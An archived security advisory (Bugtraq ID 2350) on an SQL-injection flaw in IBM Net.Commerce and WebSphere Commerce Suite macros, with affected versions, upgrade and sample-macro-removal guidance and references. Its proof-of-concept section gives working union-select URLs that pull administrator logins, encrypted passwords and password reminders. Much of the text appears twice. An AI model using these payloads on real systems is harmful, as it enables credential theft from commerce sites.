IBM Net.Commerce Remote Arbitrary Command Execution Vulnerability
BID:2350
Info
IBM Net.Commerce Remote Arbitrary Command Execution Vulnerability
| Bugtraq ID: | 2350 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Feb 05 2001 12:00AM |
| Updated: | Feb 05 2001 12:00AM |
| Credit: | Reported to bugtraq by rudi carell <[email protected]> on Mon, 5 Feb 2001 |
| Vulnerable: |
IBM WebSphere Commerce Suite Service Provider 3.2 IBM WebSphere Commerce Suite Service Provider 3.1.2 IBM WebSphere Commerce Suite Pro 4.1.1 IBM WebSphere Commerce Suite Pro 4.1 IBM WebSphere Commerce Suite MarketPlace 4.1 IBM Net.Commerce Start 3.2 IBM Net.Commerce Start 3.1.2 IBM Net.Commerce Start 3.1.1 IBM Net.Commerce Start 3.1 IBM Net.Commerce Pro 3.2 IBM Net.Commerce Pro 3.1.2 IBM Net.Commerce Pro 3.1.1 IBM Net.Commerce Pro 3.1 IBM Net.Commerce Hosting Server 3.2 IBM Net.Commerce Hosting Server 3.1.2 IBM Net.Commerce Hosting Server 3.1.1 IBM Net.Commerce 3.0 IBM Net.Commerce 2.0 |
| Not Vulnerable: |
IBM WebSphere Commerce Suite Pro 5.1 |
Exploit / POC
IBM Net.Commerce Remote Arbitrary Command Execution Vulnerability
To obtain the administrator accounts use the following URL:
http://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlogid+as+mestname,0+from+shopper+where+shshtyp+%3d+'A';
To obtain the encrypted passwords use the following URL:
http://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlpswd+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';
To obtain the password reminders use the following URL:
http://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shchaans+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';
"orderdspc.d2w" is not the only vulnerable macro. It is just used as an example. Casting between different data-types is possible. Read the DB2 manual pages.
It may also be possible to query other databases.
To obtain the administrator accounts use the following URL:
http://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlogid+as+mestname,0+from+shopper+where+shshtyp+%3d+'A';
To obtain the encrypted passwords use the following URL:
http://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlpswd+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';
To obtain the password reminders use the following URL:
http://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shchaans+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';
"orderdspc.d2w" is not the only vulnerable macro. It is just used as an example. Casting between different data-types is possible. Read the DB2 manual pages.
It may also be possible to query other databases.
Solution / Fix
IBM Net.Commerce Remote Arbitrary Command Execution Vulnerability
Solution:
You must upgrade to a non-vulnerable version or at the very least upgrade to Net.Commerce version 3.2, which fixes the Administrator macros, while also removing the sample macros.
To remove sample macros:
* Locate the db2www.ini in the HTML document root for each instance.
* Review each ini file's MACRO_PATH to ensure that all macros are required by production and are not samples.
* Remove the directories that are not required for production.
The following directories contain sample code that should be removed from production systems. If you require a sample macro for your production systems you will need to modify it to validate its inputs.
Note:
According to IBM this bug is solved or at least there is a workaround for the problem. For more info please read
http://www-4.ibm.com/software/webservers/commerce/netcomletter.html
(information supplied by John Renne <[email protected]>)
Websphere Commerce Suite and Market Place Edition Version 4.1/4.1.1:
SUN Solaris
/opt/WebSphere/CommerceSuite/macro/en_US/base /opt/WebSphere/CommerceSuite/macro/en_US/bus2bus /opt/WebSphere/CommerceSuite/macro/en_US/category /opt/WebSphere/CommerceSuite/macro/en_US/demomall /opt/WebSphere/CommerceSuite/macro/en_US/euromall /opt/WebSphere/CommerceSuite/macro/en_US/grocery /opt/WebSphere/CommerceSuite/macro/en_US/product /opt/WebSphere/CommerceSuite/macro/en_US/tutorial /opt/WebSphere/CommerceSuite/models
IBM AIX
/usr/lpp/CommerceSuite/macro/en_US/base /usr/lpp/CommerceSuite/macro/en_US/bus2bus /usr/lpp/CommerceSuite/macro/en_US/category /usr/lpp/CommerceSuite/macro/en_US/demomall /usr/lpp/CommerceSuite/macro/en_US/euromall /usr/lpp/CommerceSuite/macro/en_US/grocery /usr/lpp/CommerceSuite/macro/en_US/product /usr/lpp/CommerceSuite/macro/en_US/tutorial /usr/lpp/CommerceSuite/models
Windows NT
IBM\CommerceSuite\macro\en_US\base IBM\CommerceSuite\macro\en_US\bus2bus IBM\CommerceSuite\macro\en_US\category IBM\CommerceSuite\macro\en_US\demomall IBM\CommerceSuite\macro\en_US\euromall IBM\CommerceSuite\macro\en_US\grocery IBM\CommerceSuite\macro\en_US\product IBM\CommerceSuite\macro\en_US\ncsample IBM\CommerceSuite\macro\en_US\tutorial
IBM\CommerceSuite\models IBM\CommerceSuite\instance\<instancename>\teditor
Net.Commerce/Service Provider Edition Version 3.2
SUN Solaris
/opt/IBMnetc/NetCommerce3/macro/en_US/bus2bus /opt/IBMnetc/NetCommerce3/macro/en_US/category /opt/IBMnetc/NetCommerce3/macro/en_US/demomall /opt/IBMnetc/NetCommerce3/macro/en_US/euromall /opt/IBMnetc/NetCommerce3/macro/en_US/grocery /opt/IBMnetc/NetCommerce3/macro/en_US/ncsample /opt/IBMnetc/NetCommerce3/macro/en_US/product /opt/IBMnetc/NetCommerce3/macro/en_US/tutorial
IBM AIX
/usr/lpp/NetCommerce3/macro/en_US/bus2bus /usr/lpp/NetCommerce3/macro/en_US/category /usr/lpp/NetCommerce3/macro/en_US/demomall /usr/lpp/NetCommerce3/macro/en_US/euromall /usr/lpp/NetCommerce3/macro/en_US/grocery /usr/lpp/NetCommerce3/macro/en_US/ncsample /usr/lpp/NetCommerce3/macro/en_US/product /usr/lpp/NetCommerce3/macro/en_US/tutorial
Windows NT
IBM\NetCommerce3\macro\en_US\bus2bus IBM\NetCommerce3\macro\en_US\category IBM\NetCommerce3\macro\en_US\demomall IBM\NetCommerce3\macro\en_US\euromall IBM\NetCommerce3\macro\en_US\grocery IBM\NetCommerce3\macro\en_US\ncsample IBM\NetCommerce3\macro\en_US\product IBM\NetCommerce3\macro\en_US\tutorial
Solution:
You must upgrade to a non-vulnerable version or at the very least upgrade to Net.Commerce version 3.2, which fixes the Administrator macros, while also removing the sample macros.
To remove sample macros:
* Locate the db2www.ini in the HTML document root for each instance.
* Review each ini file's MACRO_PATH to ensure that all macros are required by production and are not samples.
* Remove the directories that are not required for production.
The following directories contain sample code that should be removed from production systems. If you require a sample macro for your production systems you will need to modify it to validate its inputs.
Note:
According to IBM this bug is solved or at least there is a workaround for the problem. For more info please read
http://www-4.ibm.com/software/webservers/commerce/netcomletter.html
(information supplied by John Renne <[email protected]>)
Websphere Commerce Suite and Market Place Edition Version 4.1/4.1.1:
SUN Solaris
/opt/WebSphere/CommerceSuite/macro/en_US/base /opt/WebSphere/CommerceSuite/macro/en_US/bus2bus /opt/WebSphere/CommerceSuite/macro/en_US/category /opt/WebSphere/CommerceSuite/macro/en_US/demomall /opt/WebSphere/CommerceSuite/macro/en_US/euromall /opt/WebSphere/CommerceSuite/macro/en_US/grocery /opt/WebSphere/CommerceSuite/macro/en_US/product /opt/WebSphere/CommerceSuite/macro/en_US/tutorial /opt/WebSphere/CommerceSuite/models
IBM AIX
/usr/lpp/CommerceSuite/macro/en_US/base /usr/lpp/CommerceSuite/macro/en_US/bus2bus /usr/lpp/CommerceSuite/macro/en_US/category /usr/lpp/CommerceSuite/macro/en_US/demomall /usr/lpp/CommerceSuite/macro/en_US/euromall /usr/lpp/CommerceSuite/macro/en_US/grocery /usr/lpp/CommerceSuite/macro/en_US/product /usr/lpp/CommerceSuite/macro/en_US/tutorial /usr/lpp/CommerceSuite/models
Windows NT
IBM\CommerceSuite\macro\en_US\base IBM\CommerceSuite\macro\en_US\bus2bus IBM\CommerceSuite\macro\en_US\category IBM\CommerceSuite\macro\en_US\demomall IBM\CommerceSuite\macro\en_US\euromall IBM\CommerceSuite\macro\en_US\grocery IBM\CommerceSuite\macro\en_US\product IBM\CommerceSuite\macro\en_US\ncsample IBM\CommerceSuite\macro\en_US\tutorial
IBM\CommerceSuite\models IBM\CommerceSuite\instance\<instancename>\teditor
Net.Commerce/Service Provider Edition Version 3.2
SUN Solaris
/opt/IBMnetc/NetCommerce3/macro/en_US/bus2bus /opt/IBMnetc/NetCommerce3/macro/en_US/category /opt/IBMnetc/NetCommerce3/macro/en_US/demomall /opt/IBMnetc/NetCommerce3/macro/en_US/euromall /opt/IBMnetc/NetCommerce3/macro/en_US/grocery /opt/IBMnetc/NetCommerce3/macro/en_US/ncsample /opt/IBMnetc/NetCommerce3/macro/en_US/product /opt/IBMnetc/NetCommerce3/macro/en_US/tutorial
IBM AIX
/usr/lpp/NetCommerce3/macro/en_US/bus2bus /usr/lpp/NetCommerce3/macro/en_US/category /usr/lpp/NetCommerce3/macro/en_US/demomall /usr/lpp/NetCommerce3/macro/en_US/euromall /usr/lpp/NetCommerce3/macro/en_US/grocery /usr/lpp/NetCommerce3/macro/en_US/ncsample /usr/lpp/NetCommerce3/macro/en_US/product /usr/lpp/NetCommerce3/macro/en_US/tutorial
Windows NT
IBM\NetCommerce3\macro\en_US\bus2bus IBM\NetCommerce3\macro\en_US\category IBM\NetCommerce3\macro\en_US\demomall IBM\NetCommerce3\macro\en_US\euromall IBM\NetCommerce3\macro\en_US\grocery IBM\NetCommerce3\macro\en_US\ncsample IBM\NetCommerce3\macro\en_US\product IBM\NetCommerce3\macro\en_US\tutorial
References
IBM Net.Commerce Remote Arbitrary Command Execution Vulnerability
References:
References:
- IBM Net.Data Administration and Programming Guide for Workstation v7 (IBM)
- Letter from Ed Kilroy (IBM)
- Net.Data Coding Guidelines for Security (IBM)
- Security Issue 2001-1 (IBM)
- WebSphere Commerce Security Issue 2000-3 (IBM)
- WebSphere Commerce Security Issue 2000-4 (IBM)
- WebSphere Commerce Security Issue 2000-5 (IBM)
- WebSphere Commerce Security Issue 2001-3 (IBM)
- WebSphere Commerce Security Issue 2001-4 (IBM)